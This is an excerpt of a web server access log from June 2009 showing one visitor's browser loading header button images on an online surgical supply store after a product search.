68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
68.213.29.168 - - [24/Jun/2009:08:40:55 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):7479300" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
